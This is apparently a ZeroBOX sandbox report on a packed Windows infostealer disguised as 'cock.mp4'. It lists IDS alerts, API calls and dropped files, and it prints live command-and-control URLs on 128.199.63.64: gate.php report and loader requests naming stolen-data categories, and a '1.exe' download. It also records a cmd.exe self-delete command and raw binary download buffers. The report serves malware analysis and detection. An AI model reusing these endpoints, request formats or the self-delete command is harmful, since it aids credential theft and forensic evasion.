Summary | ZeroBOX

cock.mp4

Tags: Gen1, VMProtect, UPX, Malicious Library, Malicious Packer, PE File, OS Processor Check, PE32, DLL
Category FILE
Machine s1_win7_x6401
Started Oct. 19, 2021, 9:42 a.m.
Completed Oct. 19, 2021, 9:53 a.m.
Size 4.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d050948cba26749ca0ae38c401cae549
SHA256 ebcfd0fc3ecbf9281e9f42e858be21770fd7e3d92facd23d3dc589f01b1a1091
CRC32 6FA5B062
ssdeep 98304:Jf0gnUUlBQgyoOqHAvtgWgyuccfQ+qDh/d8:h0gUUlqHqMgyuTfQ2
Yara
  • VMProtect_Zero - VMProtect packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library

Name | Response | Post-Analysis Lookup
No hosts contacted.

IP Address | Status | Action
128.199.63.64 | Active | Moloch
164.124.101.2 | Active | Moloch
185.121.177.177 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2018752 | ET MALWARE Generic .bin download from Dotted Quad | A Network Trojan was detected
TCP 128.199.63.64:80 -> 192.168.56.101:49198 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation
TCP 128.199.63.64:80 -> 192.168.56.101:49198 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022818 | ET MALWARE Generic gate .php GET with minimal headers | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022986 | ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2030802 | ET HUNTING Suspicious GET To gate.php with no Referer | Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022818 | ET MALWARE Generic gate .php GET with minimal headers | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022986 | ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2030802 | ET HUNTING Suspicious GET To gate.php with no Referer | Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022818 | ET MALWARE Generic gate .php GET with minimal headers | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022986 | ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2030802 | ET HUNTING Suspicious GET To gate.php with no Referer | Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022818 | ET MALWARE Generic gate .php GET with minimal headers | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2022986 | ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2030802 | ET HUNTING Suspicious GET To gate.php with no Referer | Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\cock.mp4
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Active code page: 65001
console_handle: 0x00000013
1 1 0

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .vmp0
section .vmp1
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/deepanal/system/assets/bundle.bin
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=settings
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=ip
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3
suspicious_features Connection to IP address | suspicious_request GET http://128.199.63.64/hoetnaca/exps/1.exe
request GET http://128.199.63.64/deepanal/system/assets/bundle.bin
request GET http://128.199.63.64/deepanal/gate.php?type=settings
request GET http://128.199.63.64/deepanal/gate.php?type=ip
request GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
request GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3
request GET http://128.199.63.64/hoetnaca/exps/1.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00280000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef90000
allocation_type: 1060864 (MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a40000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1892
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7efa0000
allocation_type: 1060864 (MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1892
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 876544
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773b0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13711183872
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll
cmdline cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\cock.mp4
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00240000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Áf=߅SŒ…SŒ…SŒ\s¬Œ„SŒ\sQ„SŒRich…SŒPEL`âÅ`à! O0O@O.rsrcOO@@ €e€f(€g@€hX€ip€jˆ€k €l¸€mЀnè€o€p€q0€rH€s`€tx€u€v¨€wÀ€xØ€yð€z€{ €|8€}P€~h€€€€˜€°€ÈØèø(8HXhxˆ˜¨¸ÈØèø(8HXhxˆ Ø í(  W¨l I°µ O¸ KÀO qÈÀ gÐ' Y؀ _àß _è>QðIøظ°Þ¸shR5@C¨•6(ëЀ=¸9 ˆºG¸·@rKGH¹KGPLQXQLI`šLIhãLIp,MKxwMI€ÀMˆÝNKMZÿÿ¸@øº´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ; ;$;X;h;Ð<Ô<Ø<Ü<à<ä<è<ì<ð<ô<ø<ü<˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>€>„>ˆ>Œ>>”>˜>œ> >¤>¨>¬>°>´>¸>¼>À>Ä>È>Ì>Ð>Ô>Ø>Ü>à>ä>è>ì>ð>ô>ø>ü>??? ????? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?€?„?ˆ?Œ??”?˜?œ? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?ô?ø?ü?`000 00000 0$0(0,0004080<0@0D0H0L0P0T0T3X3`34(444L4P4l4p4Œ44¬4°4Ì4Ð4ð45,505P5p55°5Ð5ð5606P6p66°6Ð6ð6707P7p77°7Ð7ð78,808 ìÐ1Ô1Ø1Ü17H7X7h7x7ˆ7 7¬7°7´7Ð7Ô7ˆ8˜8œ8 8¤8¨8¬8°8´8¸8¼8È8Ì8Ð8Ô8Ø8Ü8à8ä8::H;L;P;T;X;\;`;d;h;l;p;t;x;|;€;„;ˆ;Œ; ;°;È;Ø;ð;<<(<@<P<h<x<< <¸<È<à<ð<==0=@=X=h=€==¨=¸=Ð=à=ø=> >0>X>p>t>x>€>˜>¨>Ð>è>ì>ð>ø>? ?8?H?`?p?ˆ?˜?°?À?Ø?è?° 00(080P0`0x0ˆ0 0°0È0Ø0ð011(1@1P1h1x11 1¸1È1à1ð12202@2X2h2€22¨2¸2Ð2à2ø23 303H3L3P3T3X3p3t3x3|3€3˜3œ3 3¤3¨3À3Ä3È3Ì3Ð3è3ì3ð3ô3ø34444 484<4@4D4H4X4`4p4€4ˆ4˜4¨4°4À4è45(585P5`5x5|5€5„5ˆ5Œ55”5˜5œ5 5¤5¨5¬5°5´5¸5¼5È5Ð5à5ð5ø566 606@6H6X6h6p6€6˜6¨6À6Ð6è6ø6`8d8h8l8p8ˆ8Œ88”8˜8°8´8¸8¼8À8Ø8Ü8à8ä8è8999 99(9,9094989P9T9X9\9`9x9|9€9„9ˆ9 9¤9¨9¬9°9È9Ì9Ð9Ô9Ø9ð9ô9ø9ü9::: :$:(:@:D:H:L:P:h:l:p:t:x::”:˜:œ: :¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:ì:ð:ô:ø:ü:;; ;;$;(;0;4;<;@;H;T;X;`;d;l;p;x;|;„;;œ; ;¨;¬;´;¸;À;Ä;Ì;Ð;Ø;Ü;ä;è;ð;ô;ü;<< <<< <$<,<0<8<<<D<H<P<T<\<`<h<l<t<x<€<„<Œ<<˜<¤<°<´<¼<À<È<Ì<Ô<Ø<à<ä<ì<ð<ø<ü<===== =(=,=4=8=@=D=L=P=X=\=d=h=p=t=|=€=ˆ=Œ=”=˜= =¤=¬=°=¸=¼=Ä=È=Ð=Ô=Ü=à=è=ô=ø=>> >>$>0><>H>T>`>d>l>p>x>|>„>>œ>¨>´>¸>Ð>à>ø>? ?0?8?@?H?P?h?p??”?˜?œ? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?MZÿÿ¸@º´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Ø?ó?L<0E0N0W0‚0¤0È0:1é1û1 2y2Ø233¡3À3ñ3C5}6˜6®6Ä6Ì60:8;I;É=&>+>=>[>o>u> ,ò2a3r3ƒ3­34"4¾4Ò4ã45}5‘526x768m9°`L1\1`1d1h1l1x1|1€11”1œ1 1¨1°1¸1À1È1Ð1Ø1à1è1ð1ø12222 2(20282@2H2P2X2`2h2p2x2€2ˆ22˜2 2¨2°2¸2À2È2Ð2Ø2à2è2ð2ø23333 3(30383@3H3P3X3`3h3p3x3€3ˆ33˜3 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x4€4ˆ44˜4 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555@;D;H;À>È>Ð>Ô>Ø>Ü>à>ä>è>ì>ô>ø>ü>??? ???$?,?0?4?8?<?H?L?P?T?X?\?`?d?h?l?p?t?x?|?€?„?ˆ?Œ??”?ÀÀx4|4€4„4ˆ4Œ44”4˜4œ4 4¤4¨4¬4°4´4¸4¼4À4Ä4È4Ì4Ð4Ô4Ø4Ü4à4ä4è4ì4ð4ô4ø4ü4555 55555 5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5€5„5ˆ5Œ55”5˜5œ5 5¤5¨5¬5°5´5¸5¼5À5Ä5È5Ì5Ð5Ô5Ø5¼9À9Ä9È9ÐÐ 222$2,242<2D2L2T2\2d2l2t2|2„2Œ2”2œ2¤2¬2´2¼2Ä2Ì2Ô2Ü2ä2ì2ô2ü23 333$3,343<3D3L3T3\3d3l3t3|3„3Œ3”3œ3¤3¬3´3¼3Ä3Ì3Ô3Ü3ä3ì3ô3ü34 444$4,444<4D4L4T4\4d4l4t4|4„4Œ4”4œ4¤4¬4´4¼4Ä4Ì4Ô4Ü4ä4ì4ô4ü45 555$5,545<5D5L5T5\5d5l5t5|5„5Œ5”5œ5¤5¬5´5¼5Ä5Ì5Ô5Ü5ä5ì5ô5ü56 666$6,646<6D6L6T6\6d6l6t6|6„6Œ6”6œ6¤6¬6´6¼6Ä6Ì6Ô6Ü6ä6ì6ô6ü67 777$7,747<7D7L7T7\7d7l7t7|7„7Œ7”7œ7¤7¬7´7¼7Ä7Ì7Ô7Ü7ä7ì7ô7ü78 888$8,848<8D8L8T8\8d8l8t8|8„8Œ8”8œ8¤8¬8´8¼8Ä8Ì8Ô8Ü8ä8ì8ô8ü89 999$9àÐ0383@3H3P3X3`3h3p3x3€3ˆ33˜3 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x4€4ˆ44˜4 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555 5(50585@5H5P5X5`5h5p5x5€5ˆ55˜5 5¨5°5¸5À5È5Ð5Ø5à5è5ð5ø56666 6(60686@6H6P6X6`6h6p6x6€6ˆ66˜6 6¨6°6¸6À6È6Ð6Ø6à6è6ð6ø67777 7(70787@7H7P7X7`7h7p7x7€7ˆ77˜7 7¨7°7¸7À7È7Ð7Ø7à7è7ð7ø78888 8(80888@8H8P8X8`8h8p8x8€8ˆ88˜8 8¨8°8¸8À8È8Ð8Ø8à8è8ð8ø89999 9(90989@9H9P9X9`9h9p9x9€9ˆ99˜9 9¨9°9¸9À9È9Ð9Ø9à9è9ð9ø9:::: :(:0:8:@:H:ðL:4>4B4F4L=T=\=d=l=t=|=„=Œ=”=œ=¤=¬=´=¼=Ä=Ì=Ô=Ü=ä=ì=ô=ü=> >>>$>,>lL:P:X:; ;,;D;H;d;h;„;ˆ;¨;È;è;<(<H<h<ˆ<¨<È<ä<è<=(=D=H=h=ˆ=¨=È=è=>(>H>h>ˆ>¨>È>è>?(?H?h?ˆ?¨?È?è?0(0H0h0„0ˆ0 PÐ1Ô1Ø1Ü1¨2Ø2è2ø23303<3@3D3`3d3È9Ð9Ô9Ø9Ü9à9ä9è9ì9ð9ô9::: :::::MZÿÿ¸@¸º´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

